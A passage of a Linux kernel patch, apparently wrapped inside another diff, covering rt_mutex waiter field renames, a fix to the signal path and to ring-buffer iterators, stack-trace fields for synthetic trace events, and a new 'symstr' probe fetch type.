+@@ -105,7 +122,7 @@ static inline bool rt_mutex_waiter_is_top_waiter(struct rt_mutex_base *lock,
+ {
+ 	struct rb_node *leftmost = rb_first_cached(&lock->waiters);
+ 
+-	return rb_entry(leftmost, struct rt_mutex_waiter, tree_entry) == waiter;
++	return rb_entry(leftmost, struct rt_mutex_waiter, tree.entry) == waiter;
+ }
+ 
+ static inline struct rt_mutex_waiter *rt_mutex_top_waiter(struct rt_mutex_base *lock)
+@@ -113,8 +130,10 @@ static inline struct rt_mutex_waiter *rt_mutex_top_waiter(struct rt_mutex_base *
+ 	struct rb_node *leftmost = rb_first_cached(&lock->waiters);
+ 	struct rt_mutex_waiter *w = NULL;
+ 
++	lockdep_assert_held(&lock->wait_lock);
++
+ 	if (leftmost) {
+-		w = rb_entry(leftmost, struct rt_mutex_waiter, tree_entry);
++		w = rb_entry(leftmost, struct rt_mutex_waiter, tree.entry);
+ 		BUG_ON(w->lock != lock);
+ 	}
+ 	return w;
+@@ -127,8 +146,10 @@ static inline int task_has_pi_waiters(struct task_struct *p)
+ 
+ static inline struct rt_mutex_waiter *task_top_pi_waiter(struct task_struct *p)
+ {
++	lockdep_assert_held(&p->pi_lock);
++
+ 	return rb_entry(p->pi_waiters.rb_leftmost, struct rt_mutex_waiter,
+-			pi_tree_entry);
++			pi_tree.entry);
+ }
+ 
+ #define RT_MUTEX_HAS_WAITERS	1UL
+@@ -190,8 +211,8 @@ static inline void debug_rt_mutex_free_waiter(struct rt_mutex_waiter *waiter)
+ static inline void rt_mutex_init_waiter(struct rt_mutex_waiter *waiter)
+ {
+ 	debug_rt_mutex_init_waiter(waiter);
+-	RB_CLEAR_NODE(&waiter->pi_tree_entry);
+-	RB_CLEAR_NODE(&waiter->tree_entry);
++	RB_CLEAR_NODE(&waiter->pi_tree.entry);
++	RB_CLEAR_NODE(&waiter->tree.entry);
+ 	waiter->wake_state = TASK_NORMAL;
+ 	waiter->task = NULL;
+ }
+diff --git a/kernel/locking/ww_mutex.h b/kernel/locking/ww_mutex.h
+index 56f139201f246..3ad2cc4823e59 100644
+--- a/kernel/locking/ww_mutex.h
++++ b/kernel/locking/ww_mutex.h
+@@ -96,25 +96,25 @@ __ww_waiter_first(struct rt_mutex *lock)
+ 	struct rb_node *n = rb_first(&lock->rtmutex.waiters.rb_root);
+ 	if (!n)
+ 		return NULL;
+-	return rb_entry(n, struct rt_mutex_waiter, tree_entry);
++	return rb_entry(n, struct rt_mutex_waiter, tree.entry);
+ }
+ 
+ static inline struct rt_mutex_waiter *
+ __ww_waiter_next(struct rt_mutex *lock, struct rt_mutex_waiter *w)
+ {
+-	struct rb_node *n = rb_next(&w->tree_entry);
++	struct rb_node *n = rb_next(&w->tree.entry);
+ 	if (!n)
+ 		return NULL;
+-	return rb_entry(n, struct rt_mutex_waiter, tree_entry);
++	return rb_entry(n, struct rt_mutex_waiter, tree.entry);
+ }
+ 
+ static inline struct rt_mutex_waiter *
+ __ww_waiter_prev(struct rt_mutex *lock, struct rt_mutex_waiter *w)
+ {
+-	struct rb_node *n = rb_prev(&w->tree_entry);
++	struct rb_node *n = rb_prev(&w->tree.entry);
+ 	if (!n)
+ 		return NULL;
+-	return rb_entry(n, struct rt_mutex_waiter, tree_entry);
++	return rb_entry(n, struct rt_mutex_waiter, tree.entry);
+ }
+ 
+ static inline struct rt_mutex_waiter *
+@@ -123,7 +123,7 @@ __ww_waiter_last(struct rt_mutex *lock)
+ 	struct rb_node *n = rb_last(&lock->rtmutex.waiters.rb_root);
+ 	if (!n)
+ 		return NULL;
+-	return rb_entry(n, struct rt_mutex_waiter, tree_entry);
++	return rb_entry(n, struct rt_mutex_waiter, tree.entry);
+ }
+ 
+ static inline void
+diff --git a/kernel/signal.c b/kernel/signal.c
+index d140672185a48..5d45f5da2b36e 100644
+--- a/kernel/signal.c
++++ b/kernel/signal.c
+@@ -561,6 +561,10 @@ bool unhandled_signal(struct task_struct *tsk, int sig)
+ 	if (handler != SIG_IGN && handler != SIG_DFL)
+ 		return false;
+ 
++	/* If dying, we handle all new signals by ignoring them */
++	if (fatal_signal_pending(tsk))
++		return false;
++
+ 	/* if ptraced, let the tracer determine */
+ 	return !tsk->ptrace;
+ }
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index c264421c4ecd8..c49ed619a64dd 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -529,6 +529,8 @@ struct ring_buffer_per_cpu {
+ 	rb_time_t			before_stamp;
+ 	u64				event_stamp[MAX_NEST];
+ 	u64				read_stamp;
++	/* pages removed since last reset */
++	unsigned long			pages_removed;
+ 	/* ring buffer pages to update, > 0 to add, < 0 to remove */
+ 	long				nr_pages_to_update;
+ 	struct list_head		new_pages; /* new pages to add */
+@@ -564,6 +566,7 @@ struct ring_buffer_iter {
+ 	struct buffer_page		*head_page;
+ 	struct buffer_page		*cache_reader_page;
+ 	unsigned long			cache_read;
++	unsigned long			cache_pages_removed;
+ 	u64				read_stamp;
+ 	u64				page_stamp;
+ 	struct ring_buffer_event	*event;
+@@ -1967,6 +1970,8 @@ rb_remove_pages(struct ring_buffer_per_cpu *cpu_buffer, unsigned long nr_pages)
+ 		to_remove = rb_list_head(to_remove)->next;
+ 		head_bit |= (unsigned long)to_remove & RB_PAGE_HEAD;
+ 	}
++	/* Read iterators need to reset themselves when some pages removed */
++	cpu_buffer->pages_removed += nr_removed;
+ 
+ 	next_page = rb_list_head(to_remove)->next;
+ 
+@@ -1988,12 +1993,6 @@ rb_remove_pages(struct ring_buffer_per_cpu *cpu_buffer, unsigned long nr_pages)
+ 		cpu_buffer->head_page = list_entry(next_page,
+ 						struct buffer_page, list);
+ 
+-	/*
+-	 * change read pointer to make sure any read iterators reset
+-	 * themselves
+-	 */
+-	cpu_buffer->read = 0;
+-
+ 	/* pages are removed, resume tracing and then free the pages */
+ 	atomic_dec(&cpu_buffer->record_disabled);
+ 	raw_spin_unlock_irq(&cpu_buffer->reader_lock);
+@@ -4385,6 +4384,7 @@ static void rb_iter_reset(struct ring_buffer_iter *iter)
+ 
+ 	iter->cache_reader_page = iter->head_page;
+ 	iter->cache_read = cpu_buffer->read;
++	iter->cache_pages_removed = cpu_buffer->pages_removed;
+ 
+ 	if (iter->head) {
+ 		iter->read_stamp = cpu_buffer->read_stamp;
+@@ -4841,12 +4841,13 @@ rb_iter_peek(struct ring_buffer_iter *iter, u64 *ts)
+ 	buffer = cpu_buffer->buffer;
+ 
+ 	/*
+-	 * Check if someone performed a consuming read to
+-	 * the buffer. A consuming read invalidates the iterator
+-	 * and we need to reset the iterator in this case.
++	 * Check if someone performed a consuming read to the buffer
++	 * or removed some pages from the buffer. In these cases,
++	 * iterator was invalidated and we need to reset it.
+ 	 */
+ 	if (unlikely(iter->cache_read != cpu_buffer->read ||
+-		     iter->cache_reader_page != cpu_buffer->reader_page))
++		     iter->cache_reader_page != cpu_buffer->reader_page ||
++		     iter->cache_pages_removed != cpu_buffer->pages_removed))
+ 		rb_iter_reset(iter);
+ 
+  again:
+@@ -5291,6 +5292,7 @@ rb_reset_cpu(struct ring_buffer_per_cpu *cpu_buffer)
+ 	cpu_buffer->last_overrun = 0;
+ 
+ 	rb_head_page_activate(cpu_buffer);
++	cpu_buffer->pages_removed = 0;
+ }
+ 
+ /* Must have disabled the cpu buffer then done a synchronize_rcu */
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 27bbe180a2ef2..709af9631be45 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5627,7 +5627,7 @@ static const char readme_msg[] =
+ 	"\t           +|-[u]<offset>(<fetcharg>), \\imm-value, \\\"imm-string\"\n"
+ 	"\t     type: s8/16/32/64, u8/16/32/64, x8/16/32/64, string, symbol,\n"
+ 	"\t           b<bit-width>@<bit-offset>/<container-size>, ustring,\n"
+-	"\t           <type>\\[<array-size>\\]\n"
++	"\t           symstr, <type>\\[<array-size>\\]\n"
+ #ifdef CONFIG_HIST_TRIGGERS
+ 	"\t    field: <stype> <name>;\n"
+ 	"\t    stype: u8/u16/u32/u64, s8/s16/s32/s64, pid_t,\n"
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index ac7af03ce8372..3d3505286aa7f 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -113,6 +113,12 @@ enum trace_type {
+ #define MEM_FAIL(condition, fmt, ...)					\
+ 	DO_ONCE_LITE_IF(condition, pr_err, "ERROR: " fmt, ##__VA_ARGS__)
+ 
++#define FAULT_STRING "(fault)"
++
++#define HIST_STACKTRACE_DEPTH	16
++#define HIST_STACKTRACE_SIZE	(HIST_STACKTRACE_DEPTH * sizeof(unsigned long))
++#define HIST_STACKTRACE_SKIP	5
++
+ /*
+  * syscalls are special, and need special handling, this is why
+  * they are not included in trace_entries.h
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index e679239864965..0447c46ef4d71 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -609,7 +609,6 @@ static int __ftrace_event_enable_disable(struct trace_event_file *file,
+ {
+ 	struct trace_event_call *call = file->event_call;
+ 	struct trace_array *tr = file->tr;
+-	unsigned long file_flags = file->flags;
+ 	int ret = 0;
+ 	int disable;
+ 
+@@ -633,6 +632,8 @@ static int __ftrace_event_enable_disable(struct trace_event_file *file,
+ 				break;
+ 			disable = file->flags & EVENT_FILE_FL_SOFT_DISABLED;
+ 			clear_bit(EVENT_FILE_FL_SOFT_MODE_BIT, &file->flags);
++			/* Disable use of trace_buffered_event */
++			trace_buffered_event_disable();
+ 		} else
+ 			disable = !(file->flags & EVENT_FILE_FL_SOFT_MODE);
+ 
+@@ -671,6 +672,8 @@ static int __ftrace_event_enable_disable(struct trace_event_file *file,
+ 			if (atomic_inc_return(&file->sm_ref) > 1)
+ 				break;
+ 			set_bit(EVENT_FILE_FL_SOFT_MODE_BIT, &file->flags);
++			/* Enable use of trace_buffered_event */
++			trace_buffered_event_enable();
+ 		}
+ 
+ 		if (!(file->flags & EVENT_FILE_FL_ENABLED)) {
+@@ -710,15 +713,6 @@ static int __ftrace_event_enable_disable(struct trace_event_file *file,
+ 		break;
+ 	}
+ 
+-	/* Enable or disable use of trace_buffered_event */
+-	if ((file_flags & EVENT_FILE_FL_SOFT_DISABLED) !=
+-	    (file->flags & EVENT_FILE_FL_SOFT_DISABLED)) {
+-		if (file->flags & EVENT_FILE_FL_SOFT_DISABLED)
+-			trace_buffered_event_enable();
+-		else
+-			trace_buffered_event_disable();
+-	}
+-
+ 	return ret;
+ }
+ 
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 0f5d16eabd3b0..1470af2190735 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -479,10 +479,6 @@ DEFINE_HIST_FIELD_FN(u8);
+ #define for_each_hist_key_field(i, hist_data)	\
+ 	for ((i) = (hist_data)->n_vals; (i) < (hist_data)->n_fields; (i)++)
+ 
+-#define HIST_STACKTRACE_DEPTH	16
+-#define HIST_STACKTRACE_SIZE	(HIST_STACKTRACE_DEPTH * sizeof(unsigned long))
+-#define HIST_STACKTRACE_SKIP	5
+-
+ #define HITCOUNT_IDX		0
+ #define HIST_KEY_SIZE_MAX	(MAX_FILTER_STR_VAL + HIST_STACKTRACE_SIZE)
+ 
+@@ -3843,6 +3839,9 @@ static int check_synth_field(struct synth_event *event,
+ 	    && field->is_dynamic)
+ 		return 0;
+ 
++	if (strstr(hist_field->type, "long[") && field->is_stack)
++		return 0;
++
+ 	if (strcmp(field->type, hist_field->type) != 0) {
+ 		if (field->size != hist_field->size ||
+ 		    (!field->is_string && field->is_signed != hist_field->is_signed))
+diff --git a/kernel/trace/trace_events_synth.c b/kernel/trace/trace_events_synth.c
+index 89083ae1aebe3..b0d3876c96ab2 100644
+--- a/kernel/trace/trace_events_synth.c
++++ b/kernel/trace/trace_events_synth.c
+@@ -184,6 +184,14 @@ static int synth_field_is_string(char *type)
+ 	return false;
+ }
+ 
++static int synth_field_is_stack(char *type)
++{
++	if (strstr(type, "long[") != NULL)
++		return true;
++
++	return false;
++}
++
+ static int synth_field_string_size(char *type)
+ {
+ 	char buf[4], *end, *start;
+@@ -259,6 +267,8 @@ static int synth_field_size(char *type)
+ 		size = sizeof(gfp_t);
+ 	else if (synth_field_is_string(type))
+ 		size = synth_field_string_size(type);
++	else if (synth_field_is_stack(type))
++		size = 0;
+ 
+ 	return size;
+ }
+@@ -303,6 +313,8 @@ static const char *synth_field_fmt(char *type)
+ 		fmt = "%x";
+ 	else if (synth_field_is_string(type))
+ 		fmt = "%.*s";
++	else if (synth_field_is_stack(type))
++		fmt = "%s";
+ 
+ 	return fmt;
+ }
+@@ -382,6 +394,23 @@ static enum print_line_t print_synth_event(struct trace_iterator *iter,
+ 						 i == se->n_fields - 1 ? "" : " ");
+ 				n_u64 += STR_VAR_LEN_MAX / sizeof(u64);
+ 			}
++		} else if (se->fields[i]->is_stack) {
++			u32 offset, data_offset, len;
++			unsigned long *p, *end;
++
++			offset = (u32)entry->fields[n_u64];
++			data_offset = offset & 0xffff;
++			len = offset >> 16;
++
++			p = (void *)entry + data_offset;
++			end = (void *)p + len - (sizeof(long) - 1);
++
++			trace_seq_printf(s, "%s=STACK:\n", se->fields[i]->name);
++
++			for (; *p && p < end; p++)
++				trace_seq_printf(s, "=> %pS\n", (void *)*p);
++			n_u64++;
++
+ 		} else {
+ 			struct trace_print_flags __flags[] = {
+ 			    __def_gfpflag_names, {-1, NULL} };
+@@ -458,6 +487,43 @@ static unsigned int trace_string(struct synth_trace_event *entry,
+ 	return len;
+ }
+ 
++static unsigned int trace_stack(struct synth_trace_event *entry,
++				 struct synth_event *event,
++				 long *stack,
++				 unsigned int data_size,
++				 unsigned int *n_u64)
++{
++	unsigned int len;
++	u32 data_offset;
++	void *data_loc;
++
++	data_offset = struct_size(entry, fields, event->n_u64);
++	data_offset += data_size;
++
++	for (len = 0; len < HIST_STACKTRACE_DEPTH; len++) {
++		if (!stack[len])
++			break;
++	}
++
++	/* Include the zero'd element if it fits */
++	if (len < HIST_STACKTRACE_DEPTH)
++		len++;
++
++	len *= sizeof(long);
++
++	/* Find the dynamic section to copy the stack into. */
++	data_loc = (void *)entry + data_offset;
++	memcpy(data_loc, stack, len);
++
++	/* Fill in the field that holds the offset/len combo */
++	data_offset |= len << 16;
++	*(u32 *)&entry->fields[*n_u64] = data_offset;
++
++	(*n_u64)++;
++
++	return len;
++}
++
+ static notrace void trace_event_raw_event_synth(void *__data,
+ 						u64 *var_ref_vals,
+ 						unsigned int *var_ref_idx)
+@@ -510,6 +576,12 @@ static notrace void trace_event_raw_event_synth(void *__data,
+ 					   event->fields[i]->is_dynamic,
+ 					   data_size, &n_u64);
+ 			data_size += len; /* only dynamic string increments */
++		} else if (event->fields[i]->is_stack) {
++			long *stack = (long *)(long)var_ref_vals[val_idx];
++
++			len = trace_stack(entry, event, stack,
++					   data_size, &n_u64);
++			data_size += len;
+ 		} else {
+ 			struct synth_field *field = event->fields[i];
+ 			u64 val = var_ref_vals[val_idx];
+@@ -572,6 +644,9 @@ static int __set_synth_event_print_fmt(struct synth_event *event,
+ 		    event->fields[i]->is_dynamic)
+ 			pos += snprintf(buf + pos, LEN_OR_ZERO,
+ 				", __get_str(%s)", event->fields[i]->name);
++		else if (event->fields[i]->is_stack)
++			pos += snprintf(buf + pos, LEN_OR_ZERO,
++				", __get_stacktrace(%s)", event->fields[i]->name);
+ 		else
+ 			pos += snprintf(buf + pos, LEN_OR_ZERO,
+ 					", REC->%s", event->fields[i]->name);
+@@ -708,7 +783,8 @@ static struct synth_field *parse_synth_field(int argc, char **argv,
+ 		ret = -EINVAL;
+ 		goto free;
+ 	} else if (size == 0) {
+-		if (synth_field_is_string(field->type)) {
++		if (synth_field_is_string(field->type) ||
++		    synth_field_is_stack(field->type)) {
+ 			char *type;
+ 
+ 			len = sizeof("__data_loc ") + strlen(field->type) + 1;
+@@ -739,6 +815,8 @@ static struct synth_field *parse_synth_field(int argc, char **argv,
+ 
+ 	if (synth_field_is_string(field->type))
+ 		field->is_string = true;
++	else if (synth_field_is_stack(field->type))
++		field->is_stack = true;
+ 
+ 	field->is_signed = synth_field_signed(field->type);
+  out:
+diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
+index bb2f95d7175c2..eef9806bb9b14 100644
+--- a/kernel/trace/trace_probe.c
++++ b/kernel/trace/trace_probe.c
+@@ -64,7 +64,7 @@ int PRINT_TYPE_FUNC_NAME(string)(struct trace_seq *s, void *data, void *ent)
+ 	int len = *(u32 *)data >> 16;
+ 
+ 	if (!len)
+-		trace_seq_puts(s, "(fault)");
++		trace_seq_puts(s, FAULT_STRING);
+ 	else
+ 		trace_seq_printf(s, "\"%s\"",
+ 				 (const char *)get_loc_data(data, ent));
+@@ -76,9 +76,11 @@ const char PRINT_TYPE_FMT_NAME(string)[] = "\\\"%s\\\"";
+ /* Fetch type information table */
+ static const struct fetch_type probe_fetch_types[] = {
+ 	/* Special types */
+-	__ASSIGN_FETCH_TYPE("string", string, string, sizeof(u32), 1,
++	__ASSIGN_FETCH_TYPE("string", string, string, sizeof(u32), 1, 1,
+ 			    "__data_loc char[]"),
+-	__ASSIGN_FETCH_TYPE("ustring", string, string, sizeof(u32), 1,
++	__ASSIGN_FETCH_TYPE("ustring", string, string, sizeof(u32), 1, 1,
++			    "__data_loc char[]"),
++	__ASSIGN_FETCH_TYPE("symstr", string, string, sizeof(u32), 1, 1,
+ 			    "__data_loc char[]"),
+ 	/* Basic types */
+ 	ASSIGN_FETCH_TYPE(u8,  u8,  0),
+@@ -662,16 +664,26 @@ static int traceprobe_parse_probe_arg_body(const char *argv, ssize_t *size,
+ 
+ 	ret = -EINVAL;
+ 	/* Store operation */
+-	if (!strcmp(parg->type->name, "string") ||
+-	    !strcmp(parg->type->name, "ustring")) {
+-		if (code->op != FETCH_OP_DEREF && code->op != FETCH_OP_UDEREF &&
+-		    code->op != FETCH_OP_IMM && code->op != FETCH_OP_COMM &&
+-		    code->op != FETCH_OP_DATA && code->op != FETCH_OP_TP_ARG) {
+-			trace_probe_log_err(offset + (t ? (t - arg) : 0),
+-					    BAD_STRING);
+-			goto fail;
++	if (parg->type->is_string) {
++		if (!strcmp(parg->type->name, "symstr")) {
++			if (code->op != FETCH_OP_REG && code->op != FETCH_OP_STACK &&
++			    code->op != FETCH_OP_RETVAL && code->op != FETCH_OP_ARG &&
++			    code->op != FETCH_OP_DEREF && code->op != FETCH_OP_TP_ARG) {
++				trace_probe_log_err(offset + (t ? (t - arg) : 0),
++						    BAD_SYMSTRING);
++				goto fail;
++			}
++		} else {
++			if (code->op != FETCH_OP_DEREF && code->op != FETCH_OP_UDEREF &&
++			    code->op != FETCH_OP_IMM && code->op != FETCH_OP_COMM &&
++			    code->op != FETCH_OP_DATA && code->op != FETCH_OP_TP_ARG) {
++				trace_probe_log_err(offset + (t ? (t - arg) : 0),
++						    BAD_STRING);
++				goto fail;
++			}
+ 		}
+-		if ((code->op == FETCH_OP_IMM || code->op == FETCH_OP_COMM ||
++		if (!strcmp(parg->type->name, "symstr") ||
++		    (code->op == FETCH_OP_IMM || code->op == FETCH_OP_COMM ||
+ 		     code->op == FETCH_OP_DATA) || code->op == FETCH_OP_TP_ARG ||
+ 		     parg->count) {
+ 			/*
+@@ -679,6 +691,8 @@ static int traceprobe_parse_probe_arg_body(const char *argv, ssize_t *size,
+ 			 * must be kept, and if parg->count != 0, this is an
+ 			 * array of string pointers instead of string address
+ 			 * itself.
++			 * For the symstr, it doesn't need to dereference, thus
++			 * it just get the value.
+ 			 */
+ 			code++;
+ 			if (code->op != FETCH_OP_NOP) {
+@@ -690,6 +704,8 @@ static int traceprobe_parse_probe_arg_body(const char *argv, ssize_t *size,
+ 		if (!strcmp(parg->type->name, "ustring") ||
+ 		    code->op == FETCH_OP_UDEREF)
+ 			code->op = FETCH_OP_ST_USTRING;
++		else if (!strcmp(parg->type->name, "symstr"))
++			code->op = FETCH_OP_ST_SYMSTR;
+ 		else
+ 			code->op = FETCH_OP_ST_STRING;
+ 		code->size = parg->type->size;
+@@ -919,8 +935,7 @@ static int __set_print_fmt(struct trace_probe *tp, char *buf, int len,
+ 	for (i = 0; i < tp->nr_args; i++) {
+ 		parg = tp->args + i;
+ 		if (parg->count) {
+-			if ((strcmp(parg->type->name, "string") == 0) ||
+-			    (strcmp(parg->type->name, "ustring") == 0))
++			if (parg->type->is_string)
+ 				fmt = ", __get_str(%s[%d])";
+ 			else
+ 				fmt = ", REC->%s[%d]";
+@@ -928,8 +943,7 @@ static int __set_print_fmt(struct trace_probe *tp, char *buf, int len,
+ 				pos += snprintf(buf + pos, LEN_OR_ZERO,
+ 						fmt, parg->name, j);
+ 		} else {
+-			if ((strcmp(parg->type->name, "string") == 0) ||
+-			    (strcmp(parg->type->name, "ustring") == 0))
++			if (parg->type->is_string)
+ 				fmt = ", __get_str(%s)";
+ 			else
+ 				fmt = ", REC->%s";
+diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
+index 3d731aac94d49..f41c330bd60f1 100644
+--- a/kernel/trace/trace_probe.h
++++ b/kernel/trace/trace_probe.h
+@@ -98,6 +98,7 @@ enum fetch_op {
+ 	FETCH_OP_ST_UMEM,	/* Mem: .offset, .size */
+ 	FETCH_OP_ST_STRING,	/* String: .offset, .size */
+ 	FETCH_OP_ST_USTRING,	/* User String: .offset, .size */
++	FETCH_OP_ST_SYMSTR,	/* Kernel Symbol String: .offset, .size */
+ 	// Stage 4 (modify) op
+ 	FETCH_OP_MOD_BF,	/* Bitfield: .basesize, .lshift, .rshift */
+ 	// Stage 5 (loop) op
+@@ -133,7 +134,8 @@ struct fetch_insn {
+ struct fetch_type {
+ 	const char		*name;		/* Name of type */
+ 	size_t			size;		/* Byte size of type */
+-	int			is_signed;	/* Signed flag */
++	bool			is_signed;	/* Signed flag */
++	bool			is_string;	/* String flag */
+ 	print_type_func_t	print;		/* Print functions */
+ 	const char		*fmt;		/* Format string */
+ 	const char		*fmttype;	/* Name in format file */
+@@ -177,16 +179,19 @@ DECLARE_BASIC_PRINT_TYPE_FUNC(symbol);
+ #define _ADDR_FETCH_TYPE(t) __ADDR_FETCH_TYPE(t)
+ #define ADDR_FETCH_TYPE _ADDR_FETCH_TYPE(BITS_PER_LONG)
+ 
+-#define __ASSIGN_FETCH_TYPE(_name, ptype, ftype, _size, sign, _fmttype)	\
+-	{.name = _name,				\
++#define __ASSIGN_FETCH_TYPE(_name, ptype, ftype, _size, sign, str, _fmttype)	\
++	{.name = _name,					\
+ 	 .size = _size,					\
+-	 .is_signed = sign,				\
++	 .is_signed = (bool)sign,			\
++	 .is_string = (bool)str,			\
+ 	 .print = PRINT_TYPE_FUNC_NAME(ptype),		\
+ 	 .fmt = PRINT_TYPE_FMT_NAME(ptype),		\
+ 	 .fmttype = _fmttype,				\
+ 	}
++
++/* Non string types can use these macros */
+ #define _ASSIGN_FETCH_TYPE(_name, ptype, ftype, _size, sign, _fmttype)	\
+-	__ASSIGN_FETCH_TYPE(_name, ptype, ftype, _size, sign, #_fmttype)
++	__ASSIGN_FETCH_TYPE(_name, ptype, ftype, _size, sign, 0, #_fmttype)
+ #define ASSIGN_FETCH_TYPE(ptype, ftype, sign)			\
+ 	_ASSIGN_FETCH_TYPE(#ptype, ptype, ftype, sizeof(ftype), sign, ptype)
+ 
+@@ -431,6 +436,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
+ 	C(ARRAY_TOO_BIG,	"Array number is too big"),		\
+ 	C(BAD_TYPE,		"Unknown type is specified"),		\
+ 	C(BAD_STRING,		"String accepts only memory argument"),	\
++	C(BAD_SYMSTRING,	"Symbol String doesn't accept data/userdata"),	\
+ 	C(BAD_BITFIELD,		"Invalid bitfield"),			\
+ 	C(ARG_NAME_TOO_LONG,	"Argument name is too long"),		\
+ 	C(NO_ARG_NAME,		"Argument name is not specified"),	\
+diff --git a/kernel/trace/trace_probe_kernel.h b/kernel/trace/trace_probe_kernel.h
+index 77dbd9ff97826..2da70be83831c 100644
+--- a/kernel/trace/trace_probe_kernel.h
++++ b/kernel/trace/trace_probe_kernel.h
+@@ -2,8 +2,6 @@
+ #ifndef __TRACE_PROBE_KERNEL_H_
+ #define __TRACE_PROBE_KERNEL_H_
+ 
+-#define FAULT_STRING "(fault)"
+-
+ /*
+  * This depends on trace_probe.h, but can not include it due to
+  * the way trace_probe_tmpl.h is used by trace_kprobe.c and trace_eprobe.c.
+@@ -15,16 +13,8 @@ static nokprobe_inline int
+ kern_fetch_store_strlen_user(unsigned long addr)
+ {
+ 	const void __user *uaddr =  (__force const void __user *)addr;
+-	int ret;
+ 
+-	ret = strnlen_user_nofault(uaddr, MAX_STRING_SIZE);
+-	/*
+-	 * strnlen_user_nofault returns zero on fault, insert the
+-	 * FAULT_STRING when that occurs.
+-	 */
+-	if (ret <= 0)
+-		return strlen(FAULT_STRING) + 1;
+-	return ret;
++	return strnlen_user_nofault(uaddr, MAX_STRING_SIZE);
+ }
+ 
+ /* Return the length of string -- including null terminal byte */
+@@ -44,18 +34,14 @@ kern_fetch_store_strlen(unsigned long addr)
+ 		len++;
+ 	} while (c && ret == 0 && len < MAX_STRING_SIZE);
+ 
+-	/* For faults, return enough to hold the FAULT_STRING */
+-	return (ret < 0) ? strlen(FAULT_STRING) + 1 : len;
++	return (ret < 0) ? ret : len;
+ }
+ 
+-static nokprobe_inline void set_data_loc(int ret, void *dest, void *__dest, void *base, int len)
++static nokprobe_inline void set_data_loc(int ret, void *dest, void *__dest, void *base)
+ {
+-	if (ret >= 0) {
+-		*(u32 *)dest = make_data_loc(ret, __dest - base);
+-	} else {
+-		strscpy(__dest, FAULT_STRING, len);
+-		ret = strlen(__dest) + 1;
+-	}
++	if (ret < 0)
++		ret = 0;
++	*(u32 *)dest = make_data_loc(ret, __dest - base);
+ }
+ 
+ /*
+@@ -76,7 +62,7 @@ kern_fetch_store_string_user(unsigned long addr, void *dest, void *base)
+ 	__dest = get_loc_data(dest, base);
+ 
+ 	ret = strncpy_from_user_nofault(__dest, uaddr, maxlen);
+-	set_data_loc(ret, dest, __dest, base, maxlen);
++	set_data_loc(ret, dest, __dest, base);
+ 
+ 	return ret;
+ }
+@@ -107,7 +93,7 @@ kern_fetch_store_string(unsigned long addr, void *dest, void *base)
+ 	 * probing.
+ 	 */
+ 	ret = strncpy_from_kernel_nofault(__dest, (void *)addr, maxlen);
+-	set_data_loc(ret, dest, __dest, base, maxlen);
++	set_data_loc(ret, dest, __dest, base);
+ 
+ 	return ret;
+ }
+diff --git a/kernel/trace/trace_probe_tmpl.h b/kernel/trace/trace_probe_tmpl.h
+index c293a607d5366..3e2f5a43b974c 100644
+--- a/kernel/trace/trace_probe_tmpl.h
++++ b/kernel/trace/trace_probe_tmpl.h
+@@ -67,6 +67,37 @@ probe_mem_read(void *dest, void *src, size_t size);
+ static nokprobe_inline int
+ probe_mem_read_user(void *dest, void *src, size_t size);
+ 
++static nokprobe_inline int
++fetch_store_symstrlen(unsigned long addr)
++{
++	char namebuf[KSYM_SYMBOL_LEN];
++	int ret;
++
++	ret = sprint_symbol(namebuf, addr);
++	if (ret < 0)
++		return 0;
++
++	return ret + 1;
++}
++
++/*
++ * Fetch a null-terminated symbol string + offset. Caller MUST set *(u32 *)buf
++ * with max length and relative data location.
++ */
++static nokprobe_inline int
++fetch_store_symstring(unsigned long addr, void *dest, void *base)
++{
++	int maxlen = get_loc_len(*(u32 *)dest);
++	void *__dest;
++
++	if (unlikely(!maxlen))
++		return -ENOMEM;
++
++	__dest = get_loc_data(dest, base);
++
++	return sprint_symbol(__dest, addr);
++}
++
+ /* From the 2nd stage, routine is same */
+ static nokprobe_inline int
+ process_fetch_insn_bottom(struct fetch_insn *code, unsigned long val,
+@@ -99,16 +130,22 @@ stage2:
+ stage3:
+ 	/* 3rd stage: store value to buffer */
+ 	if (unlikely(!dest)) {
+-		if (code->op == FETCH_OP_ST_STRING) {
++		switch (code->op) {
++		case FETCH_OP_ST_STRING:
+ 			ret = fetch_store_strlen(val + code->offset);
+ 			code++;
+ 			goto array;
+-		} else if (code->op == FETCH_OP_ST_USTRING) {
+-			ret += fetch_store_strlen_user(val + code->offset);
++		case FETCH_OP_ST_USTRING:
++			ret = fetch_store_strlen_user(val + code->offset);
+ 			code++;
+ 			goto array;
+-		} else
++		case FETCH_OP_ST_SYMSTR:
++			ret = fetch_store_symstrlen(val + code->offset);
++			code++;
++			goto array;
++		default:
+ 			return -EILSEQ;
++		}
+ 	}
+ 
+ 	switch (code->op) {
+@@ -129,6 +166,10 @@ stage3:
+ 		loc = *(u32 *)dest;
+ 		ret = fetch_store_string_user(val + code->offset, dest, base);
+ 		break;
++	case FETCH_OP_ST_SYMSTR:
++		loc = *(u32 *)dest;
++		ret = fetch_store_symstring(val + code->offset, dest, base);
++		break;
+ 	default:
+ 		return -EILSEQ;
+ 	}
+@@ -206,13 +247,9 @@ store_trace_args(void *data, struct trace_probe *tp, void *rec,
+ 		if (unlikely(arg->dynamic))
+ 			*dl = make_data_loc(maxlen, dyndata - base);
+ 		ret = process_fetch_insn(arg->code, rec, dl, base);
+-		if (arg->dynamic) {
+-			if (unlikely(ret < 0)) {
+-				*dl = make_data_loc(0, dyndata - base);
+-			} else {
+-				dyndata += ret;
+-				maxlen -= ret;
+-			}
++		if (arg->dynamic && likely(ret > 0)) {
++			dyndata += ret;
++			maxlen -= ret;
+ 		}
+ 	}
+ }
